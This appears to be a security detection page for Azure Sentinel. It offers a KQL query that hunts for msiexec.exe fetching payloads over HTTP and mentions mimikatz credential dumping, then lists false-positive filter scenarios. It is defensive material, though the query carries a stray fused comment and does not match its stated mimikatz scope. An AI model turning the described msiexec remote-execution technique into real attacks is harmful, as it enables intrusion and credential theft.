Adversaries may abuse msiexec.exe to execute malicious payloads disguised as legitimate installation files. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential compromise attempts that evade traditional detection methods.
KQL Query
//Find possible download and execution using Msiexec
DeviceProcessEvents
| where Timestamp > ago(7d)
//MSIExec
| where FileName =~ "msiexec.exe" and
//With domain in command line
(ProcessCommandLine has "http" and ProcessCommandLine has "return")//Find PowerShell running files from the temp folder
id: 7a5597de-7e99-470d-944f-acb163b9cb14
name: detect-malicious-use-of-msiexec
description: |
This query was originally published in the threat analytics report, Msiexec abuse.
Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows installer packages, and are used by a wide array of legitimate software. However, malicious actors can re-purpose msiexec.exe for living-off-the-land attacks, where they use legitimate system binaries on the compromised device to perform attacks.
The following query detects activity associated with misuse of msiexec.exe, particularly alongside mimikatz, a common credential dumper and privilege escalation tool.
Reference - https://www.varonis.com/blog/what-is-mimikatz/
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
dataTypes:
- DeviceProcessEvents
tactics:
- Execution
- Privilege escalation
- Credential Access
query: |
//Find possible download and execution using Msiexec
DeviceProcessEvents
| where Timestamp > ago(7d)
//MSIExec
| where FileName =~ "msiexec.exe" and
//With domain in command line
(ProcessCommandLine has "http" and ProcessCommandLine has "return")//Find PowerShell running files from the temp folder
| Sentinel Table | Notes |
|---|---|
DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Maintenance via Group Policy
Description: A legitimate scheduled task uses msiexec.exe to install a system update or patch via a Group Policy Object (GPO).
Filter/Exclusion: Check for the presence of msiexec.exe in the context of a scheduled task with a known GPO or Microsoft update source. Use a filter like:
(Process.parent_process_name : "schtasks.exe") AND (Process.command_line : "msiexec.exe /i")Scenario: Software Deployment via Microsoft Endpoint Manager (Intune)
Description: IT administrators use Intune to deploy software packages (e.g., Microsoft Office, Adobe Reader) using msiexec.exe.
Filter/Exclusion: Filter by the msiexec.exe command line arguments associated with known enterprise software deployments. Example:
(Process.command_line : "msiexec.exe /i \"C:\\Windows\\Temp\\Office2016.msi\"") AND (Process.user : "ITAdminUser")Scenario: Admin Task to Install a Legitimate MSI Package
Description: An administrator manually installs a legitimate MSI package (e.g., Adobe Acrobat Reader, Java Runtime) using msiexec.exe.
Filter/Exclusion: Filter by the presence of a known legitimate MSI package path or use a whitelist of allowed MSI files. Example:
(Process.command_line : "msiexec.exe /i \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.msi\"")Scenario: Use of msiexec.exe in a Build Pipeline
Description: A CI/CD pipeline or build server uses msiexec.exe to install